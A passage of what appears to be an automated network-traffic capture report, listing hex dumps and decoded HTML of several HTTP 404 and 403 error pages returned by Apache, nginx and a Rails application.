20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 102edd6b-9466-4f7e-8804-87a87faaa0c4x-runtime: 0.025563content-length: 18245connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: cb9f6b69-dc63-4e2d-be7d-c6acb065fe0ax-runtime: 0.051811content-length: 18269connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 4b985045-4e35-4cf0-bbf2-5ba0b279109bx-runtime: 0.023026content-length: 19281connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:20:00 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:20:02 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:20:06 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:20:09 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 May 2024 13:20:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 May 2024 13:20:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 May 2024 13:20:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
